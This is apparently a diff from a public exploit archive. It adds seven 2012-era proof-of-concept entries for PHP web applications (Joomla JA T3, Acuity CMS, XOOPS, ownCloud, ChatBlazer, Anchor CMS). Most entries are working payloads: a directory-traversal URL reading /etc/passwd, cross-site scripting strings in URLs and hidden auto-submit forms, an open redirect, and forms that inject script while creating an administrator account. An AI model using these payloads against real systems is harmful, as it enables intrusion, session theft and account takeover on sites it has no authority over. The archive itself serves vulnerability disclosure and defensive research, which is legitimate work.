DB: 2015-05-25

7 new exploits

files.csv

@@ -33472,3 +33472,10 @@ id,file,description,date,author,platform,type,port
 37086,platforms/php/webapps/37086.txt,"WordPress Yahoo Answer Plugin Multiple Cross Site Scripting Vulnerabilities",2012-04-16,"Ryuzaki Lawlet",php,webapps,0
 37087,platforms/php/webapps/37087.txt,"TeamPass 2.1.5 'login' Field HTML Injection Vulnerability",2012-04-17,"Marcos Garcia",php,webapps,0
 37089,platforms/linux/local/37089.txt,"Fuse - Local Privilege Escalation",2015-05-23,"Tavis Ormandy",linux,local,0
+37090,platforms/php/webapps/37090.txt,"Joomla! JA T3 Framework Component Directory Traversal Vulnerability",2012-04-17,indoushka,php,webapps,0
+37091,platforms/php/webapps/37091.txt,"Acuity CMS 2.6.2 'UserName' Parameter Cross Site Scripting Vulnerability",2012-04-17,"Aung Khant",php,webapps,0
+37092,platforms/php/webapps/37092.txt,"XOOPS 2.5.4 /modules/pm/pmlite.php to_userid Parameter XSS",2012-04-18,"High-Tech Bridge SA",php,webapps,0
+37093,platforms/php/webapps/37093.txt,"XOOPS 2.5.4 /tiny_mce/plugins/xoopsimagemanager/xoopsimagebrowser.php Multiple Parameter XSS",2012-04-18,"High-Tech Bridge SA",php,webapps,0
+37094,platforms/php/webapps/37094.txt,"ownCloud 3.0.0 index.php redirect_url Parameter Arbitrary Site Redirect",2012-04-18,"Tobias Glemser",php,webapps,0
+37095,platforms/php/webapps/37095.txt,"Pendulab ChatBlazer 8.5 'username' Parameter Cross Site Scripting Vulnerability",2012-04-20,sonyy,php,webapps,0
+37096,platforms/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 'id' Parameter Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",php,webapps,0

platforms/php/webapps/37090.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/53039/info
+
+The JA T3 Framework component for Joomla! is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks. 
+
+http://www.example.com/jojo/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 

platforms/php/webapps/37091.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/53048/info
+
+
+Acuity CMS is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Acuity CMS 2.6.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/admin/login.asp?UserName=";><script>prompt(/xss/)</script> 

platforms/php/webapps/37092.txt

@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/53143/info
+
+XOOPS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+XOOPS 2.5.4 is vulnerable; other versions may be affected. 
+
+<form action='http://www.example.com/modules/pm/pmlite.php' method="post">
+<input type="hidden" name="sendmod" value='1'>
+<input type="hidden" name="to_userid" value='"><script>alert(document.cookie);</script>'>
+<input type="submit" value="submit" id="btn">
+</form>

platforms/php/webapps/37093.txt

@@ -0,0 +1,32 @@
+source: http://www.securityfocus.com/bid/53143/info
+ 
+XOOPS is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+ 
+XOOPS 2.5.4 is vulnerable; other versions may be affected. 
+
+<form action="http://www.example.com/class/xoopseditor/tinymce/tinymce/jscripts/tiny_mce/plugins/xoop simagemanager/xoopsimagebrowser.php?target=1" method="post">
+<input type="hidden" name="isadmin" value='1'>
+<input type="hidden" name="catreadcount" value='1'>
+<input type="hidden" name="catwritecount" value='1'>
+<input type="hidden" name="current_file" value='"><script>alert(document.cookie);</script>'>
+<input type="submit" value="submit" id="btn">
+</form>
+
+<form action="http://www.example.com/class/xoopseditor/tinymce/tinymce/jscripts/tiny_mce/plugins/xoop simagemanager/xoopsimagebrowser.php?target=1" method="post">
+<input type="hidden" name="isadmin" value='1'>
+<input type="hidden" name="catreadcount" value='1'>
+<input type="hidden" name="catwritecount" value='1'>
+<input type="hidden" name="imgcat_id" value='"><script>alert(document.cookie);</script>'>
+<input type="hidden" name="op" value='editcat'>
+<input type="submit" value="submit" id="btn">
+</form>
+
+<form action="http://www.example.com/class/xoopseditor/tinymce/tinymce/jscripts/tiny_mce/plugins/xoop simagemanager/xoopsimagebrowser.php" method="post">
+<input type="hidden" name="isadmin" value='1'>
+<input type="hidden" name="catreadcount" value='1'>
+<input type="hidden" name="catwritecount" value='1'>
+<input type="hidden" name="target" value='"><script>alert(document.cookie);</script>'>
+<input type="submit" value="submit" id="btn">
+</form>

platforms/php/webapps/37094.txt

@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/53145/info
+
+ownCloud is prone to a URI open-redirection vulnerability, multiple cross-site scripting vulnerabilities and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker could leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
+
+Successful exploits may redirect a user to a potentially malicious site; this may aid in phishing attacks.
+
+ownCloud 3.0.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/owncloud/index.php?redirect_url=1"><script>alert("Help Me")</script><l=" (must not be logged in)
+
+http://www.example.com/owncloud/index.php?redirect_url=http%3a//www.boeserangreifer.de/ 

platforms/php/webapps/37095.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53168/info
+
+ChatBlazer is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+ChatBlazer 8.5 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/cb8.5/client.php?username=%27;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//\%27;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//%22;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//\%22;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29%3C/SCRIPT%3E&password=&roomid=1009&config=config.php%3Fembed%3D0

platforms/php/webapps/37096.html

@@ -0,0 +1,93 @@
+source: http://www.securityfocus.com/bid/53181/info
+
+Anchor CMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Attacker-supplied HTML and script code could be executed in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks may also be possible.
+
+Anchor CMS 0.6-14-ga85d0a0 is vulnerable; other versions may also be affected. 
+
+<html>
+<title>Anchor CMS v0.6 Multiple Persistent XSS Vulnerabilities</title>
+<body bgcolor="#000000">
+<script type="text/javascript">
+function xss0(){document.forms["xss0"].submit();}
+function xss1(){document.forms["xss1"].submit();}
+function xss2(){document.forms["xss2"].submit();}
+function xss3(){document.forms["xss3"].submit();}
+function xss4(){document.forms["xss4"].submit();}
+function xss5(){document.forms["xss5"].submit();}
+</script>
+
+<form action="http://www.example.com/anchorcms/index.php/admin/users/login" enctype="application/x-www-form-urlencoded" method="POST" id="xss0">
+<input type="hidden" name="user" value='"><script>alert(1);</script>' />
+<input type="hidden" name="pass" value="admin" />
+</form>
+
+<form action="http://www.example.com/anchorcms/index.php/admin/users/amnesia" enctype="application/x-www-form-urlencoded" method="POST" id="xss1">
+<input type="hidden" name="email" value='"><script>alert(1);</script>' />
+</form>
+
+<form action="http://www.example.com/anchorcms/index.php/admin/posts/add" enctype="application/x-www-form-urlencoded" method="POST" id="xss2">
+<input type="hidden" name="title" value='"><script>alert(1);</script>' />
+<input type="hidden" name="comments" value="1" />
+<input type="hidden" name="css" value="" />
+<input type="hidden" name="description" value="ZSL" />
+<input type="hidden" name="html" value="1" />
+<input type="hidden" name="js" value="" />
+<input type="hidden" name="slug" value='"><script>alert(2);</script>' />
+<input type="hidden" name="status" value="published" />
+</form>
+
+<form action="http://www.example.com/anchorcms/index.php/admin/pages/add" enctype="application/x-www-form-urlencoded" method="POST" id="xss3">
+<input type="hidden" name="name" value='"><script>alert(1);</script>' />
+<input type="hidden" name="title" value='"><script>alert(2);</script>' />
+<input type="hidden" name="content" value="Zero Science Lab" />
+<input type="hidden" name="slug" value="ZSL" />
+<input type="hidden" name="status" value="published" />
+</form>
+
+<form action="http://www.example.com/anchorcms/index.php/admin/users/add" enctype="application/x-www-form-urlencoded" method="POST" id="xss4">
+<input type="hidden" name="real_name" value='"><script>alert(1);</script>' />
+<input type="hidden" name="bio" value="MK" />
+<input type="hidden" name="email" value='"><script>alert(3);</script>' />
+<input type="hidden" name="password" value="admin" />
+<input type="hidden" name="role" value="administrator" />
+<input type="hidden" name="status" value="active" />
+<input type="hidden" name="username" value='"><script>alert(2);</script>' />
+</form>
+
+<form action="http://www.example.com/anchorcms/index.php/admin/metadata" enctype="application/x-www-form-urlencoded" method="POST" id="xss5">
+<input type="hidden" name="auto_published_comments" value="1" />
+<input type="hidden" name="description" value='"><script>alert(1);</script>' />
+<input type="hidden" name="home_page" value="1" />
+<input type="hidden" name="posts_page" value="1" />
+<input type="hidden" name="posts_per_page" value="1" />
+<input type="hidden" name="save" value="" />
+<input type="hidden" name="sitename" value='"><script>alert(2);</script>' />
+<input type="hidden" name="theme" value="default" />
+<input type="hidden" name="twitter" value='"><script>alert(3);</script>' />
+</form>
+
+<br /><br />
+
+<a href="javascript: xss0();" style="text-decoration:none">
+<b><font color="red"><h3>XSS 0</h3></font></b></a><br />
+
+<a href="javascript: xss1();" style="text-decoration:none">
+<b><font color="red"><h3>XSS 1</h3></font></b></a><br />
+
+<a href="javascript: xss2();" style="text-decoration:none">
+<b><font color="red"><h3>XSS 2</h3></font></b></a><br />
+
+<a href="javascript: xss3();" style="text-decoration:none">
+<b><font color="red"><h3>XSS 3</h3></font></b></a><br />
+
+<a href="javascript: xss4();" style="text-decoration:none">
+<b><font color="red"><h3>XSS 4</h3></font></b></a><br />
+
+<a href="javascript: xss5();" style="text-decoration:none">
+<b><font color="red"><h3>XSS 5</h3></font></b></a><br />
+
+<a href='http://www.example.com/anchorcms/index.php/"><script>alert(1);</script>'>XSS 6</a>
+
+</body></html>